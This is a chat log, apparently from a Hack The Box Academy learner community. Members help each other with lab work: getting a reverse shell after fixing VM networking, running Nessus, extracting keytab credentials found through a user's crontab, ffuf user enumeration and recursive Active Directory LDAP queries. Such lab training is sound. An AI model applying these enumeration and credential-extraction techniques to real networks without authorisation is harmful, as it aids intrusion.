i'm not familiar with virtualbox, but i can't imagine it doesn't have some kind of network manager
i use vmware pro
it does indeed have a network manager
think about it this way: connectivity issue. it can only be a few things. 1) connectivity from your vm. 2) connectivity from your vm to your hypervisor. 3) hypervisor connection to your host. 4) your host's connection to the internet.
so if you have connectivity issues, it's one of those things. sounds like you have tried disabling firewall etc on your vm, so if you're confident it's not the vm, the next step to investigate is the hypervisor's setup.
that's where the network manager comes into play
get some rest, if all else fails the pwnbox should work
i switched to bridged. and it worked. i got a reverse shell. all i had to do was switch to bridged. i could have sworn i already did that. but it worked.
Congrats 🎉 but i still recommend reinstalling your VM bc it seems to have issues
Can’t download Nessus on Linux arm64
😒
what Process did you use to download?
The Nessus website.
They don’t have the binaries for arm64.
They do
I only saw amd64
I got ips of 2 hackers who compromised all my passwords on my google account
can someone help me
Could you screenshot it?
I only see amd64
Not sure what to do.
You’d probably have to contact google.
contact google, change all your passwords
is there a way to do it all together not 1 by 1
this isn't a hacker for hire server read #rules
no
not hiring anyone
lol…
that's the rough part of having your account compromised
i just need help on what to do
how can I check that
Nvm I thought I saw it lol. AARCH64 might work
iirc if you change your google account password there's an option to "log out of all devices"
Google it
Doesn’t work.
this isn't a support server
Did you try installing?
Yes
it seems the ubuntu AARCH64 is what people have used in the past
Yeah
Any errors?
tbqh you don't need to install Nessus for the Vulnerability Scan module
the host they have for the practical portion has nessus installed, and pre-run scans
I’m having a hard time getting through the Vulnerability Assessment module because I can’t download Nessus on my vm and it doesn’t seem to be installed on the pwnbox like they said.
lol yes.
it won't be on the pwnbox
it's on the target box at https://ip:nessusport
Hmm I’ll try that…
with the login info provided
Should work with openvpn?
yes
we can't help with a question you don't ask
Lol
Someone actually hosting a website to explain all that wow
check the other links on that site
actually useful
Ok I'm in carlos's crontab, I spot the sh script that uses kinit as the svc_workstations user, the script then executes smbclient to connect. the question says I need to auth via SSH, I'm lost on how to obtain credentials of that svc_workstations.kt
It’s not loading. Idk.
are you connected to the vpn?
there's a way to extract keytab info
read the section carefully
Yes ma’am… see my tun0 ip up there in the corner?
do you have the pwnbox running as well?
yes I used that tool in another question, but the file was .keytab, this one is .kt, is it the same way?
what do you think .kt is short for? 😉
I can ssh into that ip, but this Nessus stuff ain’t workin.
it should be
No
do you only have one VPN connection running
i also suggest checking that file location for other notable files
not just what's referenced by the script
I download it onto my Mac, but it says it’s takes a long time to run the scans.
There is supposed to be a “preloaded” Nessus to help answer the questions.
Only one.
reset the target and try connecting again
because it should be running on https
Unless I’m doing something wrong… 🤷🏽♂️
Ahhh… that mtu trick you taught me. 😊
Ifconfig tun0 mtu 1250 😉
lol could have sworn that was you. It’s usually you helping me here lol.
Someone taught me that here.
your picture shows 118 mins uptime. so it's been up 2 mins. for some modules you need to wait 3-5 mins for it to fully boot.
plus you never said what module so it's impossible to help
Module: AD Enumeration & Attacks
Section: Living Off the Land
Can someone suggest a resource to construct LDAP filters? I'm having trouble with it.
Hey guys! Was wondering if anyone could advise on the skills assessment for broken authentication. I'm using ffuf to enumerate the users but even with a bunch of threads it is going to take forever
take a look at the example and how it's constructed, there's also the big breakdown of how it works
not sure if it's the intended path and was wondering if I could get some guidance
I did go through it. The exact part I'm having trouble with is the third rule. How would I use it? Could you provide an example?
wdym "third rule?"
https://ldapwiki.com/wiki/
https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20RISK%20Related%20Searches
https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20Computer%20Related%20LDAP%20Query
https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20User%20Related%20Searches
https://ldapwiki.com/wiki/Wiki.jsp?page=Active%20Directory%20Group%20Related%20Searches
Actually, the second and third rule, the matching rules.
1.2.840.113556.1.4.804 and 1.2.840.113556.1.4.1941
I don't know how to use them.
what's the question
Could someone provide an example?
can I msg you? 🙂
yeah
thx 😄
I figured it out.
You can add time to the machine. It wasn’t that.
they're explained in just below them
Yeah, I understood that, but how do I set multiple attributes? Do I just total the attributes?
So if I wanted to see the attributes Login Script Will Execute and Account is Disabled, it'd be 3?
yep
for the last question you'll likely have to do some googling to figure out all of what you need
Noted
or you can get a partial idea then look up a user the normal way
just think of the key bits of what it asks for
user; disabled; admin; description these are all different fields you need to query
as you see the LDAP doesn't show "admin"
for the OID search
so at most you'd need (&(1) (2) (3) (4))
ooh found a good github that's an LDAP cheatsheet @normal sand https://gist.github.com/jonlabelle/0f8ec20c2474084325a89bc5362008a7
Thanks!
it contains at least most (aside from description, but you might be able to guess that one)
most what?
most of what you'll need to answer the last question
idk if doing the query without the description will still show the description or not
Okay, I'm gonna try it out now.
just remember each part of the query is its own thing in parentheses (&(1)(2)(3))
I got the flag.
Nice
I have one question though.
I feel like that cheatsheet definitely demystifies a fair bit of it
But I can't ask it here without revealing the query I used, so is it alright for me to DM you?
For sure.
i mean it's likely the query I used
The thing is, I got 2 results.
I wasn't able to filter it down to just one, so I'm wondering if I'm missing something.
well yes; one likely doesn't have a description set
they both match the rest of the criteria up to the description
Both have a description set. One has the flag, and the other has the description || Key Distribution Center Service Account||
ah!
then I know what your query may have been
you still got the answer, and that's what's important
I thought I had filtered for ||person|| and ||user||
So I don't understand why that showed.
did you use ObjectClass or ObjectCategory
Both
For category I used ||person|| and for class I used ||user||.
1.2.840.113556.1.4.804: A match is found if any bits from the attribute match the value. This rule is equivalent to a bitwise OR operator.
1.2.840.113556.1.4.1941: This rule is limited to filters that apply to the DN. This is a special "extended" match operator that walks the chain of ancestry in objects all the way to the root until it finds a match. basically use it for recursive search
use user for category instead
Just category or should I use it for class as well?
Still getting two results.
then the query will just return 2 results
did you grab the -attr samaccountname description ?
This rule is limited to filters that apply to the DN.
What's DN?
deeznuts yes Distinguished Name
I've understood your explanation for the first rule you mentioned. However, for the rule 1.2.840.113556.1.4.1941, you're saying it can only be applied to the DN attribute, but I don't get the recursive search thing? Isn't DN a unique attribute?
well
you're recursively searching specific attributes
i.e. you only know the ou and dc of a uid so you might construct "uid=*,ou=Person,dc=example,dc=com"
Alright, I think I vaguely get it 😅
Yes so you filter using that DN as the filter and there's no ambiguity in the query. e.g:
This matching rule will find all groups that the user is a member of including nested groups
Get-ADGroup -Properties * -LDAPFilter '(member:1.2.840.113556.1.4.1941:=(CN=UserName,CN=Users,DC=YOURDOMAIN,DC=NET))'
So... it's essentially a recursive search for a DN?
yep
that's why cheatsheets exist 
Having flashbacks to the Introduction to AD module 💀
just write a bunch of premade queries and you can just paste the specific information in
but the chances that you'll need to write custom queries are pretty low
Noted
I'm finally getting it 
Took me a min, this article gave me flashbacks and reminded me of the basics 🤣
ldap is ez, chatgpt
real
tbh yeah as long as you can understand what it spits out you're good
I actually tried it earlier and it spouted some rubbish, prolly cuz my prompt wasn't good tho 
haha yeah. it can hallucinate too sometimes.
or just come up with a bad way to do your request when there's an easier cmdlet or something
this is the funniest shit from chatgpt
to follow up; the official walkthrough also shows 2 answers
I haven't gotten to the concept yet, but I've had GPT spit out similar nonsense in the past 😂
so; it is an intended thing to have 2 results